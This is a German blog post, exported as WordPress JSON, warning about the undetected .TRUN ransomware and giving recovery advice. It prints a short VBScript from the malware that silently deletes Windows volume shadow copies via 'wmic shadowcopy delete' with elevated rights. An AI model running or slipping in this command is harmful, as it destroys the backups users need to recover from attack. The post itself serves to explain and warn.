{"id":175002,"date":"2016-02-14T01:03:00","date_gmt":"2016-02-14T00:03:00","guid":{"rendered":"http:\/\/www.borncity.com\/blog\/?p=175002"},"modified":"2022-06-26T18:29:33","modified_gmt":"2022-06-26T16:29:33","slug":"crypto-trojaner-die-zweite-trun-der-noch-unbekannte","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2016\/02\/14\/crypto-trojaner-die-zweite-trun-der-noch-unbekannte\/","title":{"rendered":"Crypto-Trojaner die Zweite: .TRUN der (noch) Unbekannte"},"content":{"rendered":"

\"\"Nachdem ich gestern den Artikel Crypto-Trojaner die Erste: Win.Trojan.Ramnit<\/a> publiziert hatte und heise.de \u00fcber die mp3-Variante von TeslaCrypt<\/a> berichtete, nun mein Teil 2. Es geht um den Verschl\u00fcsselungs-Trojaner .TRUN, der von Virenscannern (noch) nicht erkannt wird.<\/p>\n

<\/p>\n

\"\"Vorweg: Das ist auch wieder eine Story vom \"hear say\", k\u00f6nnte mir wie hier<\/a> vorgeworfen werden. Aber: Ist der Ruf erst ruiniert, bloggt es sich g\u00e4nzlich ungeniert \u2013 und bei den Sicherheitsthemen steckt Herzblut drin \u2013 man kann nicht genug dar\u00fcber berichten und aufkl\u00e4ren. Zudem ist die Quelle valide: Ex MVP, MVP-Pendant bei HP in den Foren, lange als freiberuflicher Dienstleister unterwegs und nun im Support eines solchen f\u00fcr die schwierigeren F\u00e4lle zust\u00e4ndig. Eine wandelnde Fundgrube an Wissen \u2013 und auch noch Debug-Spezi<\/a> (ich habe mich so 1985 aus dem Thema Tracing auf Maschinencodeebene ausgeklinkt).<\/p>\n

Ein kleiner Nebensatz und ein Sack Reis f\u00e4llt um \u2026<\/h3>\n

Ich gestehe, mein Physikstudium liegt zu lange zur\u00fcck, so dass ich mich nicht mehr mit Chaos-Theorie befassen konnte. Was ich mir aber gemerkt habe: Der Fl\u00fcgelschlag eines Schmetterlings<\/a> kann dazu f\u00fchren, dass wir im Regen ersaufen \u2013 \u00fcbertrieben dargestellt. Oder ein Sack Reis, der in China umf\u00e4llt, l\u00f6st hier ein Beben aus \u2026<\/p>\n

Es war nur eine kleine Diskussion zwischen Michael B. zu meinem Beitrag hinsichtlich der Treiberinstallation auf Google +. Ich hatte ihn nach zur\u00fcckgezogenen Intel RST-Treibern gefragt, aber seine Antwort lautete:<\/p>\n

Habe da bisher noch nicht weiter geschaut, steht aber auf der Liste. Habe gestern & heute mit .TRUN gewurschtelt und das Einfallstor \/ Script inkl. URL und Keys, VBS, JS, Exe getarnt als CSS ausfindig gemacht; entschl\u00fcsseln kanns derzeit noch niemand leider :(\u00a0 und kein Virenscanner erkennt das Zeug!<\/p><\/blockquote>\n

Bam! Der ber\u00fchmte Fl\u00fcgelschlag, der mich sofort hellwach werden lie\u00df. Es gibt also was, was unter dem Namen .TRUN daherkommt und offenbar nicht gut ist.<\/p>\n

VSS werden per WSH-Script gel\u00f6scht<\/h3>\n

Ich hatte ja im gestrigen Beitrag darauf hingewiesen, dass der Ramnit-Trojaner die Systemwiederherstellung des befallenen Systems blockiert. Bei .TRUN erm\u00f6glicht folgendes, von Michael Bormann gepostete, VBscript-Progr\u00e4mmchen das L\u00f6schen der Volumenschattenkopien (VSS), die f\u00fcr die Wiederherstellung ben\u00f6tigt werden.<\/p>\n

Set objShell84bej5os = CreateObject(\"Shell.Application\")
\nSet objWshShell = WScript.CreateObject(\"WScript.Shell\")
\nSet objWshProcessEnv = objWshShell.Environment(\"PROCESS\")
\nobjShell84bej5os.ShellExecute \"wmic.exe\", \"shadowcopy delete \/nointeractive\", \"\", \"runas\", 0<\/em><\/p>\n

Es sei angemerkt, dass dieses Script unter Windows Script Host (CScript.exe) mit Administratorberechtigungen ausgef\u00fchrt werden muss. Dann sind die VSS-Kopien mit den vorherigen Daten weg. Bei Systemdateien klappt eine Systemwiederherstellung nicht mehr – bei Dokumentdateien w\u00e4re die Funktion \"Vorherige Dateiversionen\" machtlos. Und offenbar schaffen es Anwender, die Sicherheitsnachfrage der Benutzerkontensteuerung einfach mal abzunicken \u2026<\/p>\n

Einfallstor: Script mit URL, VBS, JS, EXE als CSS getarnt<\/h3>\n

Michael hat in seinem Posting noch darauf hingewiesen, welches Einfallstor .TRUN nutzt. Dort kommt neben einer .exe-Datei, die als CSS getarnt ist, auch das obige Script sowie VBScript- und JScript-Code zum Einsatz. Michael schrieb, dass kein Virenscanner die Ransomware erkenne \u2013 und wie ich ihn kenne, hat er wohl auch Virustotal bem\u00fcht.<\/p>\n

Michael B. hat hier noch eine kleine Erg\u00e4nzung geliefert \u2013 das Script wird per RunDLL gestartet, der Nutzer muss nur einmal ein JScript zur Ausf\u00fchrung freigeben.<\/p>\n

Das Script wurde via rundll32 nach jedem encrypt einer Datei gestartet, als Prozess einer DLL die die Dateien verschl\u00fcsselt. Nur ein initiales JS Script musste der Anwender starten, das war es dann.<\/p><\/blockquote>\n

Google f\u00f6rdert einige aktuelle Treffer zu Tage<\/h3>\n

Eine Suche in Google nach \".TRUN Trojaner\" f\u00f6rderte gleich einige aktuelle Treffer zu Tage. Hier mal eine Fundstelle<\/a> im trojaner-board.de \u2013 und im Chip-Forum<\/a> ist eine gute Beschreibung der \"Bewerbungs-Mail\" zu finden. Auch bei gutefrage.net schlagen Leute auf. Die restlichen Treffer zum \"entfernen\" lasst ihr bitte links liegen \u2013 sind mal wieder automatisch \u00fcbersetzte Schnipsel von Ami-Seiten, die viel versprechen, den Leuten das Geld aus der Tasche locken wollen und deren Tools nicht mal mit der Kneifzange angefasst werden sollten.<\/p>\n

Eine Seitenhieb auf dieses Google kann ich mir an dieser Stelle nicht verkneifen. Die Dumpfbacken in der Adsense-Abteilung machen sich Gedanken, dass ich Anzeigen umgestalten solle, um 15% mehr Anzeigenannahmen zu erreichen (bisheriger Ertrag einer solchen Anzeige: 0,01 Euro). Oder man schwafelt dar\u00fcber, k\u00fcnftig Webseiten, die nicht per https ausliefern, abzustrafen. Gleichzeitig wird aber der gr\u00f6\u00dfte Schrott an automatisch \u00fcbersetzten Artikeln in den vorderen Rankings ausgeworfen. Es lebe die Macht der Algorithmen im Google Universum \u2026<\/p><\/blockquote>\n

Zudem reicht \"entfernen\" nicht, denn der Trojaner verschl\u00fcsselt die Benutzerdateien und versieht diese mit der Dateinamenerweiterung .TRUN. Man k\u00f6nnte, wie die Meldungen suggerieren, dem Erpresser Kohle r\u00fcber schicken und hoffen, dass man den Entschl\u00fcsselungscode erh\u00e4lt. Aber das ist eine riskante Sache (siehe<\/a>) \u2013 sollte man nie tun!<\/p>\n

Bei Dateidaten, die vor der Infizierung liegen, kann es sein, dass das Umbenennen der Erweiterung .TRUN in die vorherige Dateinamenerweiterung die Inhalte wieder lesbar macht. Ist aber heikel, da eine infizierte Exe-Datei m\u00f6glicherweise den Trojaner wieder scharf stellt. Die L\u00f6sung: Windows neu aufsetzen oder ein Backup, welches Trojaner-frei ist, einspielen. Also alles, wie im gestrigen Beitrag Crypto-Trojaner die Erste: Win.Trojan.Ramnit<\/a>.<\/p>\n

\u00c4hnliche Artikel:
\n<\/strong>Ransom-Malware legt Klinikbetrieb lahm<\/a>
\nCrypto-Trojaner die Erste: Win.Trojan.Ramnit<\/a>
\nSicherheitsl\u00fccke in Trend Micro-Schutzsoftware<\/a>
\nNeue Android SLocker-Ransomware-Variante<\/a>
\nSicherheitsinfos zum Wochenende<\/a>
\nRettungsanker, falls Windows nicht mehr bootet<\/a>
\nSt\u00e4ndige \"Freezes\" in Windows 7<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

Nachdem ich gestern den Artikel Crypto-Trojaner die Erste: Win.Trojan.Ramnit publiziert hatte und heise.de \u00fcber die mp3-Variante von TeslaCrypt berichtete, nun mein Teil 2. Es geht um den Verschl\u00fcsselungs-Trojaner .TRUN, der von Virenscannern (noch) nicht erkannt wird.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[426,161],"tags":[4715,4328,1107,4313],"class_list":["post-175002","post","type-post","status-publish","format-standard","hentry","category-sicherheit","category-virenschutz","tag-ransomware","tag-sicherheit","tag-trojaner","tag-virenschutz"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/175002","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=175002"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/175002\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=175002"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=175002"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=175002"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}